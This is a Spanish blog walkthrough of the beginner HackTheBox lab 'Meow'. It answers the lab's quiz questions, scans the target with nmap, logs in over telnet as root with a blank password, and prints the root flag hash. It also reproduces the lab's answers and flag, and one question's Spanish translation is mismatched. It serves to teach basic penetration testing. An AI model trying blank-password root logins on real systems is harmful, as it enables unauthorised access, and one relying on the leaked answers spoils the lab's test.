Inicio HTB - Meow (Starting Point)
Entrada
Cancelar

HTB - Meow (Starting Point)

Publicado 23/01/2023
Por Manuel
2 min de lectura

Hello world!

Hoy vamos a resolver de la máquina Meow de dificultad “Fácil” de la plataforma HackTheBox.

Técnicas Usadas:

  • Recopilación de información
  • Uso de telnet y nmap

Task 1

What does the acronym VM stand for? (**¿Qué significan las siglas VM?**)

Virtual Machine

Task 2

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell. (**¿Qué herramienta utilizamos para interactuar con el sistema operativo con el fin de emitir comandos a través de la línea de comandos, como el de iniciar nuestra conexión VPN? También se conoce como consola o shell**)

Terminal

Task 3

What service do we use to form our VPN connection into HTB labs? (**¿Qué quiere decir PII?**)

openvpn

Task 4

What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output?

tun

Task 5

What tool do we use to test our connection to the target with an ICMP echo request?

Ping

Task 6

What is the name of the most common tool for finding open ports on a target?

nmap

Task 7

What service do we identify on port 23/tcp during our scans?

telnet

Usando Nmap

Usaremos la herramienta nmap para descubrir el servicio corriendo en el puerto 23

1
2
3
4
5
6

nmap -sV -vvv 10.129.41.182

    PORT   STATE SERVICE REASON  VERSION
    23/tcp open  telnet  syn-ack Linux telnetd
    Service Info: OS: Linux; CPE: cpe:o:linux:linux_kernel

Task 8

What username is able to log into the target over telnet with a blank password?

root

Usando telnet

Usamos el comando telnet para conectarnos mediante tcp hacia el objetivo y usar las creedenciales consiguiendo acceso directo a la máquina.

1
2
3
4
5
6
7
8
9
10
11

telnet 10.129.41.182   
Trying 10.129.41.182...
Connected to 10.129.41.182.
Escape character is [^].

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login:

Submit Flag

Submit root flag

b40abdfe23665f766f9c61ecba8a4c19

Escalada de privilegios

Una vez usadas las creedenciales root para entrar en la máquina vía telnet usaremos la shell para hayar la submit flag.

1
2
3
4
5

root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt 
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~#

Hemos completado la máquina Meow de HackTheBox!! Happy Hacking!!

Linux
eJPT eWPT eCPPTv2 OSCP Fácil
Esta entrada está licenciada bajo CC BY 4.0 por el autor.
Etiquetas populares
eCPPTv2 eJPT eWPT OSCP Fácil Medio Dificil
Contenido
Etiquetas populares
eCPPTv2 eJPT eWPT OSCP Fácil Medio Dificil